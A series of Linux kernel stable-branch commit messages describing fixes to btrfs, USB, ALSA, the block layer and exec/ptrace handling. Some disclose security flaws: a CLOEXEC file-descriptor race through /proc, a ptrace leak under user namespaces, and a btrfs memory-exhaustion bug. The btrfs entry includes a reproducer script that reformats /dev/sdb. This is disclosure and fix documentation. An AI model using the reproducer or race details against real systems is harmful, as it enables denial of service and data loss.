device, it can simply test if the target bdev is the whole device.
Fixes: 6b4517a791 ("block: implement bd_claiming and claiming block")
Signed-off-by: NeilBrown <neilb@suse.com>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 613cc2b6f2 upstream.
If you have a process that has set itself to be non-dumpable, and it
then undergoes exec(2), any CLOEXEC file descriptors it has open are
"exposed" during a race window between the dumpable flags of the process
being reset for exec(2) and CLOEXEC being applied to the file
descriptors. This can be exploited by a process by attempting to access
/proc/<pid>/fd/... during this window, without requiring CAP_SYS_PTRACE.
The race in question is after set_dumpable has been (for get_link,
though the trace is basically the same for readlink):
[vfs]
-> proc_pid_link_inode_operations.get_link
-> proc_pid_get_link
-> proc_fd_access_allowed
-> ptrace_may_access(task, PTRACE_MODE_READ_FSCREDS);
Which will return 0, during the race window and CLOEXEC file descriptors
will still be open during this window because do_close_on_exec has not
been called yet. As a result, the ordering of these calls should be
reversed to avoid this race window.
This is of particular concern to container runtimes, where joining a
PID namespace with file descriptors referring to the host filesystem
can result in security issues (since PRCTL_SET_DUMPABLE doesn't protect
against access of CLOEXEC file descriptors -- file descriptors which may
reference filesystem objects the container shouldn't have access to).
Cc: dev@opencontainers.org
Reported-by: Michael Crosby <crosbymichael@gmail.com>
Signed-off-by: Aleksa Sarai <asarai@suse.de>
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f84df2a6f2 upstream.
When the user namespace support was merged the need to prevent
ptrace from revealing the contents of an unreadable executable
was overlooked.
Correct this oversight by ensuring that the executed file
or files are in mm->user_ns, by adjusting mm->user_ns.
Use the new function privileged_wrt_inode_uidgid to see if
the executable is a member of the user namespace, and as such
if having CAP_SYS_PTRACE in the user namespace should allow
tracing the executable. If not update mm->user_ns to
the parent user namespace until an appropriate parent is found.
Reported-by: Jann Horn <jann@thejh.net>
Fixes: 9e4a36ece6 ("userns: Fail exec for suid and sgid binaries with ids outside our user namespace.")
Signed-off-by: "Eric W. Biederman" <ebiederm@xmission.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4867268c57 upstream.
Really there's lots of things that can go wrong here, kill all the
BUG_ON()'s and replace the logic ones with ASSERT()'s and return EIO
instead.
Signed-off-by: Josef Bacik <jbacik@fb.com>
[ switched to btrfs_err, errors go to common label ]
Reviewed-by: Liu Bo <bo.li.liu@oracle.com>
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit cea67ab92d upstream.
btrfs_rm_device frees the block device but then re-opens it using
the saved device name. A race exists between the close and the
re-open that allows the block size to be changed. The result
is getting stuck forever in the reclaim loop in __getblk_slow.
This patch moves the superblock cleanup before closing the block
device, which is also consistent with other callers. We also don't
need a private copy of dev_name as the whole routine operates under
the uuid_mutex.
Signed-off-by: Jeff Mahoney <jeffm@suse.com>
Reviewed-by: David Sterba <dsterba@suse.com>
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6bdf131fac upstream.
We don't track the reloc roots in any sort of normal way, so the only way the
root/commit_root nodes get free'd is if the relocation finishes successfully and
the reloc root is deleted. Fix this by free'ing them in free_reloc_roots.
Thanks,
Signed-off-by: Josef Bacik <jbacik@fb.com>
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3561b9db70 upstream.
When relocating tree blocks, we firstly get block information from
back references in the extent tree, we then search fs tree to try to
find all parents of a block.
However, if fs tree is corrupted, eg. if there're some missing
items, we could come across these WARN_ONs and BUG_ONs.
This makes us print some error messages and return gracefully
from balance.
Signed-off-by: Liu Bo <bo.li.liu@oracle.com>
Reviewed-by: Josef Bacik <jbacik@fb.com>
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 49303381f1 upstream.
Currently we allow inconsistence about mixed flag
(BTRFS_BLOCK_GROUP_METADATA | BTRFS_BLOCK_GROUP_DATA).
We'd get ENOSPC if block group has mixed flag and btrfs doesn't.
If that happens, we have one space_info with mixed flag and another
space_info only with BTRFS_BLOCK_GROUP_METADATA, and
global_block_rsv.space_info points to the latter one, but all bytes
from block_group contributes to the mixed space_info, thus all the
allocation will fail with ENOSPC.
This adds a check for the above case.
Reported-by: Vegard Nossum <vegard.nossum@oracle.com>
Signed-off-by: Liu Bo <bo.li.liu@oracle.com>
[ updated message ]
Reviewed-by: David Sterba <dsterba@suse.com>
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2571e73967 upstream.
So we can read a btree block via readahead or intentional read,
and we can end up with a memory leak when something happens as
follows,
1) readahead starts to read block A but does not wait for read
completion,
2) btree_readpage_end_io_hook finds that block A is corrupted,
and it needs to clear all block A's pages' uptodate bit.
3) meanwhile an intentional read kicks in and checks block A's
pages' uptodate to decide which page needs to be read.
4) when some pages have the uptodate bit during 3)'s check so
3) doesn't count them for eb->io_pages, but they are later
cleared by 2) so we has to readpage on the page, we get
the wrong eb->io_pages which results in a memory leak of
this block.
This fixes the problem by firstly getting all pages's locking and
then checking pages' uptodate bit.
t1(readahead) t2(readahead endio) t3(the following read)
read_extent_buffer_pages end_bio_extent_readpage
for pg in eb: for page 0,1,2 in eb:
if pg is uptodate: btree_readpage_end_io_hook(pg)
num_reads++ if uptodate:
eb->io_pages = num_reads SetPageUptodate(pg) _______________
for pg in eb: for page 3 in eb: read_extent_buffer_pages
if pg is NOT uptodate: btree_readpage_end_io_hook(pg) for pg in eb:
__extent_read_full_page(pg) sanity check reports something wrong if pg is uptodate:
clear_extent_buffer_uptodate(eb) num_reads++
for pg in eb: eb->io_pages = num_reads
ClearPageUptodate(page) _______________
for pg in eb:
if pg is NOT uptodate:
__extent_read_full_page(pg)
So t3's eb->io_pages is not consistent with the number of pages it's reading,
and during endio(), atomic_dec_and_test(&eb->io_pages) will get a negative
number so that we're not able to free the eb.
Signed-off-by: Liu Bo <bo.li.liu@oracle.com>
Reviewed-by: David Sterba <dsterba@suse.com>
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 035cd485a4 upstream.
The OMAP36xx DPLL5, driving EHCI USB, can be subject to a long-term
frequency drift. The frequency drift magnitude depends on the VCO update
rate, which is inversely proportional to the PLL divider. The kernel
DPLL configuration code results in a high value for the divider, leading
to a long term drift high enough to cause USB transmission errors. In
the worst case the USB PHY's ULPI interface can stop responding,
breaking USB operation completely. This manifests itself on the
Beagleboard xM by the LAN9514 reporting 'Cannot enable port 2. Maybe the
cable is bad?' in the kernel log.
Errata sprz319 advisory 2.1 documents PLL values that minimize the
drift. Use them automatically when DPLL5 is used for USB operation,
which we detect based on the requested clock rate. The clock framework
will still compute the PLL parameters and resulting rate as usual, but
the PLL M and N values will then be overridden. This can result in the
effective clock rate being slightly different than the rate cached by
the clock framework, but won't cause any adverse effect to USB
operation.
Signed-off-by: Richard Watts <rrw@kynesim.co.uk>
[Upported from v3.2 to v4.9]
Signed-off-by: Laurent Pinchart <laurent.pinchart@ideasonboard.com>
Tested-by: Ladislav Michl <ladis@linux-mips.org>
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Cc: Adam Ford <aford173@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5e0ad0d874 upstream.
Commit [64047d7f49 ALSA: hda - ignore the assoc and seq when comparing
pin configurations] intented to ignore both seq and assoc at pin
comparing, but it only ignored seq. So that commit may still fail to
match pins on some machines.
Change the bitmask to also ignore assoc.
v2: Use macro to do bit masking.
Thanks to Hui Wang for the analysis.
Fixes: 64047d7f49 ("ALSA: hda - ignore the assoc and seq when comparing...")
Signed-off-by: Kai-Heng Feng <kai.heng.feng@canonical.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f73cd43ac3 upstream.
HP Z1 Gen3 AiO with Conexant codec doesn't give an unsolicited event
to the headset mic pin upon the jack plugging, it reports only to the
headphone pin. It results in the missing mic switching. Let's fix up
by simply gating the jack event.
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 989dbe4a30 upstream.
This group of new pins is not in the pin quirk table yet, adding
them to the pin quirk table to fix the headset-mic problem.
Signed-off-by: Hui Wang <hui.wang@canonical.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 64047d7f49 upstream.
More and more pin configurations have been adding to the pin quirk
table, lots of them are only different from assoc and seq, but they
all apply to the same QUIRK_FIXUP, if we don't compare assoc and seq
when matching pin configurations, it will greatly reduce the pin
quirk table size.
We have tested this change on a couple of Dell laptops, it worked
well.
Signed-off-by: Hui Wang <hui.wang@canonical.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b5337cfe06 upstream.
I'm using an Alienware 15 R2 and had to use the alienware quirks to
get my headphone output working.
I fixed it by adding, SND_PCI_QUIRK(0x1028, 0x0708, "Alienware 15 R2
2016", QUIRK_ALIENWARE) to the patch.
Signed-off-by: Sven Hahne <hahne@zeitkunst.eu>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 995c6a7fd9 upstream.
Sampling rate changes after first set one are not reflected to the
hardware, while driver and ALSA think the rate has been changed.
Fix the problem by properly stopping the interface at the beginning of
prepare call, allowing new rate to be set to the hardware. This keeps
the hardware in sync with the driver.
Signed-off-by: Jussi Laako <jussi@sonarnerd.net>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 82ffb6fc63 upstream.
The Logitech QuickCam Communicate Deluxe/S7500 microphone fails with the
following warning.
[ 6.778995] usb 2-1.2.2.2: Warning! Unlikely big volume range (=3072),
cval->res is probably wrong.
[ 6.778996] usb 2-1.2.2.2: [5] FU [Mic Capture Volume] ch = 1, val =
4608/7680/1
Adding it to the list of devices in volume_control_quirks makes it work
properly, fixing related typo.
Signed-off-by: Con Kolivas <kernel@kolivas.org>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3e448e13a6 upstream.
ep_list inside gadget structure doesn't contain ep0.
It is stored separately in ep0 field.
This causes an urb hang if gadget driver decides to
delay setup handling. On host side this is visible as
timeout error when setting configuration.
This bug can be reproduced using for example any gadget
with mass storage function.
Fixes: abdb295743 ("usbip: vudc: Add vudc_transfer")
Signed-off-by: Krzysztof Opasiak <k.opasiak@samsung.com>
Acked-by: Shuah Khan <shuahkh@osg.samsung.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ccdb6be9ec upstream.
The UHCI controllers in Intel chipsets rely on a platform-specific non-PME
mechanism for wakeup signalling. They can generate wakeup signals even
though they don't support PME.
We need to let the USB core know this so that it will enable runtime
suspend for UHCI controllers.
Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
Signed-off-by: Bjorn Helgaas <bhelgaas@google.com>
Acked-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e8f29bb719 upstream.
usb_endpoint_maxp() returns wMaxPacketSize in its
raw form. Without taking into consideration that it
also contains other bits reserved for isochronous
endpoints.
This patch fixes one occasion where this is a
problem by making sure that we initialize
ep->maxpacket only with lower 10 bits of the value
returned by usb_endpoint_maxp(). Note that seperate
patches will be necessary to audit all call sites of
usb_endpoint_maxp() and make sure that
usb_endpoint_maxp() only returns lower 10 bits of
wMaxPacketSize.
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 37be66767e upstream.
USB-3 does not have any link state that will avoid negotiating a connection
with a plugged-in cable but will signal the host when the cable is
unplugged.
For USB-3 we used to first set the link to Disabled, then to RxDdetect to
be able to detect cable connects or disconnects. But in RxDetect the
connected device is detected again and eventually enabled.
Instead set the link into U3 and disable remote wakeups for the device.
This is what Windows does, and what Alan Stern suggested.
Cc: Alan Stern <stern@rowland.harvard.edu>
Acked-by: Alan Stern <stern@rowland.harvard.edu>
Signed-off-by: Mathias Nyman <mathias.nyman@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6b9018d4c1 upstream.
In case of High-Speed, High-Bandwidth endpoints, we
need to tell DWC3 that we have more than one packet
per interval. We do that by setting PCM1 field of
Isochronous-First TRB.
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6774d5f532 upstream.
Kill urbs and disable read before returning from open on failure to
retrieve the line state.
Fixes: 1da177e4c3 ("Linux-2.6.12-rc2")
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5b09eff0c3 upstream.
This patch adds support for PIDs 0x1040, 0x1041 of Telit LE922A.
Since the interface positions are the same than the ones used
for other Telit compositions, previous defined blacklists are used.
Signed-off-by: Daniele Palmas <dnlplm@gmail.com>
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8d9eddad19 upstream.
We were setting the qgroup_rescan_running flag to true only after the
rescan worker started (which is a task run by a queue). So if a user
space task starts a rescan and immediately after asks to wait for the
rescan worker to finish, this second call might happen before the rescan
worker task starts running, in which case the rescan wait ioctl returns
immediatley, not waiting for the rescan worker to finish.
This was making the fstest btrfs/022 fail very often.
Fixes: d2c609b834 (btrfs: properly track when rescan worker is running)
Signed-off-by: Filipe Manana <fdmanana@suse.com>
Reviewed-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ed0df618b1 upstream.
The balance status item contains currently known filter values, but the
stripes filter was unintentionally not among them. This would mean, that
interrupted and automatically restarted balance does not apply the
stripe filters.
Fixes: dee32d0ac3
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 054570a1dc upstream.
During relocation of a data block group we create a relocation tree
for each fs/subvol tree by making a snapshot of each tree using
btrfs_copy_root() and the tree's commit root, and then setting the last
snapshot field for the fs/subvol tree's root to the value of the current
transaction id minus 1. However this can lead to relocation later
dropping references that it did not create if we have qgroups enabled,
leaving the filesystem in an inconsistent state that keeps aborting
transactions.
Lets consider the following example to explain the problem, which requires
qgroups to be enabled.
We are relocating data block group Y, we have a subvolume with id 258 that
has a root at level 1, that subvolume is used to store directory entries
for snapshots and we are currently at transaction 3404.
When committing transaction 3404, we have a pending snapshot and therefore
we call btrfs_run_delayed_items() at transaction.c:create_pending_snapshot()
in order to create its dentry at subvolume 258. This results in COWing
leaf A from root 258 in order to add the dentry. Note that leaf A
also contains file extent items referring to extents from some other
block group X (we are currently relocating block group Y). Later on, still
at create_pending_snapshot() we call qgroup_account_snapshot(), which
switches the commit root for root 258 when it calls switch_commit_roots(),
so now the COWed version of leaf A, lets call it leaf A', is accessible
from the commit root of tree 258. At the end of qgroup_account_snapshot(),
we call record_root_in_trans() with 258 as its argument, which results
in btrfs_init_reloc_root() being called, which in turn calls
relocation.c:create_reloc_root() in order to create a relocation tree
associated to root 258, which results in assigning the value of 3403
(which is the current transaction id minus 1 = 3404 - 1) to the
last_snapshot field of root 258. When creating the relocation tree root
at ctree.c:btrfs_copy_root() we add a shared reference for leaf A',
corresponding to the relocation tree's root, when we call btrfs_inc_ref()
against the COWed root (a copy of the commit root from tree 258), which
is at level 1. So at this point leaf A' has 2 references, one normal
reference corresponding to root 258 and one shared reference corresponding
to the root of the relocation tree.
Transaction 3404 finishes its commit and transaction 3405 is started by
relocation when calling merge_reloc_root() for the relocation tree
associated to root 258. In the meanwhile leaf A' is COWed again, in
response to some filesystem operation, when we are still at transaction
3405. However when we COW leaf A', at ctree.c:update_ref_for_cow(), we
call btrfs_block_can_be_shared() in order to figure out if other trees
refer to the leaf and if any such trees exists, add a full back reference
to leaf A' - but btrfs_block_can_be_shared() incorrectly returns false
because the following condition is false:
btrfs_header_generation(buf) <= btrfs_root_last_snapshot(&root->root_item)
which evaluates to 3404 <= 3403. So after leaf A' is COWed, it stays with
only one reference, corresponding to the shared reference we created when
we called btrfs_copy_root() to create the relocation tree's root and
btrfs_inc_ref() ends up not being called for leaf A' nor we end up setting
the flag BTRFS_BLOCK_FLAG_FULL_BACKREF in leaf A'. This results in not
adding shared references for the extents from block group X that leaf A'
refers to with its file extent items.
Later, after merging the relocation root we do a call to to
btrfs_drop_snapshot() in order to delete the relocation tree. This ends
up calling do_walk_down() when path->slots[1] points to leaf A', which
results in calling btrfs_lookup_extent_info() to get the number of
references for leaf A', which is 1 at this time (only the shared reference
exists) and this value is stored at wc->refs[0]. After this walk_up_proc()
is called when wc->level is 0 and path->nodes[0] corresponds to leaf A'.
Because the current level is 0 and wc->refs[0] is 1, it does call
btrfs_dec_ref() against leaf A', which results in removing the single
references that the extents from block group X have which are associated
to root 258 - the expectation was to have each of these extents with 2
references - one reference for root 258 and one shared reference related
to the root of the relocation tree, and so we would drop only the shared
reference (because leaf A' was supposed to have the flag
BTRFS_BLOCK_FLAG_FULL_BACKREF set).
This leaves the filesystem in an inconsistent state as we now have file
extent items in a subvolume tree that point to extents from block group X
without references in the extent tree. So later on when we try to decrement
the references for these extents, for example due to a file unlink operation,
truncate operation or overwriting ranges of a file, we fail because the
expected references do not exist in the extent tree.
This leads to warnings and transaction aborts like the following:
[ 588.965795] ------------[ cut here ]------------
[ 588.965815] WARNING: CPU: 2 PID: 2479 at fs/btrfs/extent-tree.c:1625 lookup_inline_extent_backref+0x432/0x5b0 [btrfs]
[ 588.965816] Modules linked in: af_packet iscsi_ibft iscsi_boot_sysfs xfs libcrc32c ppdev acpi_cpufreq button tpm_tis e1000 i2c_piix4 pcspkr parport_pc
parport tpm qemu_fw_cfg joydev btrfs xor raid6_pq sr_mod cdrom ata_generic virtio_scsi ata_piix virtio_pci bochs_drm virtio_ring drm_kms_helper syscopyarea
sysfillrect sysimgblt fb_sys_fops virtio ttm serio_raw drm floppy sg
[ 588.965831] CPU: 2 PID: 2479 Comm: kworker/u8:7 Not tainted 4.7.3-3-default-fdm+ #1
[ 588.965832] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.1-0-gb3ef39f-prebuilt.qemu-project.org 04/01/2014
[ 588.965844] Workqueue: btrfs-extent-refs btrfs_extent_refs_helper [btrfs]
[ 588.965845] 0000000000000000 ffff8802263bfa28 ffffffff813af542 0000000000000000
[ 588.965847] 0000000000000000 ffff8802263bfa68 ffffffff81081e8b 0000065900000000
[ 588.965848] ffff8801db2af000 000000012bbe2000 0000000000000000 ffff880215703b48
[ 588.965849] Call Trace:
[ 588.965852] [<ffffffff813af542>] dump_stack+0x63/0x81
[ 588.965854] [<ffffffff81081e8b>] __warn+0xcb/0xf0
[ 588.965855] [<ffffffff81081f7d>] warn_slowpath_null+0x1d/0x20
[ 588.965863] [<ffffffffa0175042>] lookup_inline_extent_backref+0x432/0x5b0 [btrfs]
[ 588.965865] [<ffffffff81143220>] ? trace_clock_local+0x10/0x30
[ 588.965867] [<ffffffff8114c5df>] ? rb_reserve_next_event+0x6f/0x460
[ 588.965875] [<ffffffffa0175215>] insert_inline_extent_backref+0x55/0xd0 [btrfs]
[ 588.965882] [<ffffffffa017531f>] __btrfs_inc_extent_ref.isra.55+0x8f/0x240 [btrfs]
[ 588.965890] [<ffffffffa017acea>] __btrfs_run_delayed_refs+0x74a/0x1260 [btrfs]
[ 588.965892] [<ffffffff810cb046>] ? cpuacct_charge+0x86/0xa0
[ 588.965900] [<ffffffffa017e74f>] btrfs_run_delayed_refs+0x9f/0x2c0 [btrfs]
[ 588.965908] [<ffffffffa017ea04>] delayed_ref_async_start+0x94/0xb0 [btrfs]
[ 588.965918] [<ffffffffa01c799a>] btrfs_scrubparity_helper+0xca/0x350 [btrfs]
[ 588.965928] [<ffffffffa01c7c5e>] btrfs_extent_refs_helper+0xe/0x10 [btrfs]
[ 588.965930] [<ffffffff8109b323>] process_one_work+0x1f3/0x4e0
[ 588.965931] [<ffffffff8109b658>] worker_thread+0x48/0x4e0
[ 588.965932] [<ffffffff8109b610>] ? process_one_work+0x4e0/0x4e0
[ 588.965934] [<ffffffff810a1659>] kthread+0xc9/0xe0
[ 588.965936] [<ffffffff816f2f1f>] ret_from_fork+0x1f/0x40
[ 588.965937] [<ffffffff810a1590>] ? kthread_worker_fn+0x170/0x170
[ 588.965938] ---[ end trace 34e5232c933a1749 ]---
[ 588.966187] ------------[ cut here ]------------
[ 588.966196] WARNING: CPU: 2 PID: 2479 at fs/btrfs/extent-tree.c:2966 btrfs_run_delayed_refs+0x28c/0x2c0 [btrfs]
[ 588.966196] BTRFS: Transaction aborted (error -5)
[ 588.966197] Modules linked in: af_packet iscsi_ibft iscsi_boot_sysfs xfs libcrc32c ppdev acpi_cpufreq button tpm_tis e1000 i2c_piix4 pcspkr parport_pc
parport tpm qemu_fw_cfg joydev btrfs xor raid6_pq sr_mod cdrom ata_generic virtio_scsi ata_piix virtio_pci bochs_drm virtio_ring drm_kms_helper syscopyarea
sysfillrect sysimgblt fb_sys_fops virtio ttm serio_raw drm floppy sg
[ 588.966206] CPU: 2 PID: 2479 Comm: kworker/u8:7 Tainted: G W 4.7.3-3-default-fdm+ #1
[ 588.966207] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.1-0-gb3ef39f-prebuilt.qemu-project.org 04/01/2014
[ 588.966217] Workqueue: btrfs-extent-refs btrfs_extent_refs_helper [btrfs]
[ 588.966217] 0000000000000000 ffff8802263bfc98 ffffffff813af542 ffff8802263bfce8
[ 588.966219] 0000000000000000 ffff8802263bfcd8 ffffffff81081e8b 00000b96345ee000
[ 588.966220] ffffffffa021ae1c ffff880215703b48 00000000000005fe ffff8802345ee000
[ 588.966221] Call Trace:
[ 588.966223] [<ffffffff813af542>] dump_stack+0x63/0x81
[ 588.966224] [<ffffffff81081e8b>] __warn+0xcb/0xf0
[ 588.966225] [<ffffffff81081eff>] warn_slowpath_fmt+0x4f/0x60
[ 588.966233] [<ffffffffa017e93c>] btrfs_run_delayed_refs+0x28c/0x2c0 [btrfs]
[ 588.966241] [<ffffffffa017ea04>] delayed_ref_async_start+0x94/0xb0 [btrfs]
[ 588.966250] [<ffffffffa01c799a>] btrfs_scrubparity_helper+0xca/0x350 [btrfs]
[ 588.966259] [<ffffffffa01c7c5e>] btrfs_extent_refs_helper+0xe/0x10 [btrfs]
[ 588.966260] [<ffffffff8109b323>] process_one_work+0x1f3/0x4e0
[ 588.966261] [<ffffffff8109b658>] worker_thread+0x48/0x4e0
[ 588.966263] [<ffffffff8109b610>] ? process_one_work+0x4e0/0x4e0
[ 588.966264] [<ffffffff810a1659>] kthread+0xc9/0xe0
[ 588.966265] [<ffffffff816f2f1f>] ret_from_fork+0x1f/0x40
[ 588.966267] [<ffffffff810a1590>] ? kthread_worker_fn+0x170/0x170
[ 588.966268] ---[ end trace 34e5232c933a174a ]---
[ 588.966269] BTRFS: error (device sda2) in btrfs_run_delayed_refs:2966: errno=-5 IO failure
[ 588.966270] BTRFS info (device sda2): forced readonly
This was happening often on openSUSE and SLE systems using btrfs as the
root filesystem (with its default layout where multiple subvolumes are
used) where balance happens in the background triggered by a cron job and
snapshots are automatically created before/after package installations,
upgrades and removals. The issue could be triggered simply by running the
following loop on the first system boot post installation:
while true; do
zypper -n in nfs-kernel-server
zypper -n rm nfs-kernel-server
done
(If we were fast enough and made that loop before the cron job triggered
a balance operation and the balance finished)
So fix by setting the last_snapshot field of the root to the value of the
generation of its commit root. Like this btrfs_block_can_be_shared()
behaves correctly for the case where the relocation root is created during
a transaction commit and for the case where it's created before a
transaction commit.
Fixes: 6426c7ad69 (btrfs: qgroup: Fix qgroup accounting when creating snapshot)
Signed-off-by: Filipe Manana <fdmanana@suse.com>
Reviewed-by: Josef Bacik <jbacik@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2a7bf53f57 upstream.
If a log tree has a layout like the following:
leaf N:
...
item 240 key (282 DIR_LOG_ITEM 0) itemoff 8189 itemsize 8
dir log end 1275809046
leaf N + 1:
item 0 key (282 DIR_LOG_ITEM 3936149215) itemoff 16275 itemsize 8
dir log end 18446744073709551615
...
When we pass the value 1275809046 + 1 as the parameter start_ret to the
function tree-log.c:find_dir_range() (done by replay_dir_deletes()), we
end up with path->slots[0] having the value 239 (points to the last item
of leaf N, item 240). Because the dir log item in that position has an
offset value smaller than *start_ret (1275809046 + 1) we need to move on
to the next leaf, however the logic for that is wrong since it compares
the current slot to the number of items in the leaf, which is smaller
and therefore we don't lookup for the next leaf but instead we set the
slot to point to an item that does not exist, at slot 240, and we later
operate on that slot which has unexpected content or in the worst case
can result in an invalid memory access (accessing beyond the last page
of leaf N's extent buffer).
So fix the logic that checks when we need to lookup at the next leaf
by first incrementing the slot and only after to check if that slot
is beyond the last item of the current leaf.
Signed-off-by: Robbie Ko <robbieko@synology.com>
Reviewed-by: Filipe Manana <fdmanana@suse.com>
Fixes: e02119d5a7 (Btrfs: Add a write ahead tree log to optimize synchronous operations)
Signed-off-by: Filipe Manana <fdmanana@suse.com>
[Modified changelog for clarity and correctness]
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ef85b25e98 upstream.
This can only happen with CONFIG_BTRFS_FS_CHECK_INTEGRITY=y.
Commit 1ba98d0 ("Btrfs: detect corruption when non-root leaf has zero item")
assumes that a leaf is its root when leaf->bytenr == btrfs_root_bytenr(root),
however, we should not use btrfs_root_bytenr(root) since it's mainly got
updated during committing transaction. So the check can fail when doing
COW on this leaf while it is a root.
This changes to use "if (leaf == btrfs_root_node(root))" instead, just like
how we check whether leaf is a root in __btrfs_cow_block().
Fixes: 1ba98d086f (Btrfs: detect corruption when non-root leaf has zero item)
Reported-by: Jeff Mahoney <jeffm@suse.com>
Signed-off-by: Liu Bo <bo.li.liu@oracle.com>
Reviewed-by: Filipe Manana <fdmanana@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2939e1a86f upstream.
Problem statement: unprivileged user who has read-write access to more than
one btrfs subvolume may easily consume all kernel memory (eventually
triggering oom-killer).
Reproducer (./mkrmdir below essentially loops over mkdir/rmdir):
[root@kteam1 ~]# cat prep.sh
DEV=/dev/sdb
mkfs.btrfs -f $DEV
mount $DEV /mnt
for i in `seq 1 16`
do
mkdir /mnt/$i
btrfs subvolume create /mnt/SV_$i
ID=`btrfs subvolume list /mnt |grep "SV_$i$" |cut -d ' ' -f 2`
mount -t btrfs -o subvolid=$ID $DEV /mnt/$i
chmod a+rwx /mnt/$i
done
[root@kteam1 ~]# sh prep.sh
[maxim@kteam1 ~]$ for i in `seq 1 16`; do ./mkrmdir /mnt/$i 2000 2000 & done
[root@kteam1 ~]# for i in `seq 1 4`; do grep "kmalloc-128" /proc/slabinfo | grep -v dma; sleep 60; done
kmalloc-128 10144 10144 128 32 1 : tunables 0 0 0 : slabdata 317 317 0
kmalloc-128 9992352 9992352 128 32 1 : tunables 0 0 0 : slabdata 312261 312261 0
kmalloc-128 24226752 24226752 128 32 1 : tunables 0 0 0 : slabdata 757086 757086 0
kmalloc-128 42754240 42754240 128 32 1 : tunables 0 0 0 : slabdata 1336070 1336070 0
The huge numbers above come from insane number of async_work-s allocated
and queued by btrfs_wq_run_delayed_node.
The problem is caused by btrfs_wq_run_delayed_node() queuing more and more
works if the number of delayed items is above BTRFS_DELAYED_BACKGROUND. The
worker func (btrfs_async_run_delayed_root) processes at least
BTRFS_DELAYED_BATCH items (if they are present in the list). So, the machinery
works as expected while the list is almost empty. As soon as it is getting
bigger, worker func starts to process more than one item at a time, it takes
longer, and the chances to have async_works queued more than needed is getting
higher.
The problem above is worsened by another flaw of delayed-inode implementation:
if async_work was queued in a throttling branch (number of items >=
BTRFS_DELAYED_WRITEBACK), corresponding worker func won't quit until
the number of items < BTRFS_DELAYED_BACKGROUND / 2. So, it is possible that
the func occupies CPU infinitely (up to 30sec in my experiments): while the
func is trying to drain the list, the user activity may add more and more
items to the list.
The patch fixes both problems in straightforward way: refuse queuing too
many works in btrfs_wq_run_delayed_node and bail out of worker func if
at least BTRFS_DELAYED_WRITEBACK items are processed.
Changed in v2: remove support of thresh == NO_THRESHOLD.
Signed-off-by: Maxim Patlasov <mpatlasov@virtuozzo.com>
Signed-off-by: Chris Mason <clm@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0cbc72a178 upstream.
aoeblk contains some mysterious code, that wants to elevate the bio
vec page counts while it's under IO. That is not needed, it's
fragile, and it's causing kernel oopses for some.
Reported-by: Tested-by: Don Koch <kochd@us.ibm.com>
Tested-by: Tested-by: Don Koch <kochd@us.ibm.com>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
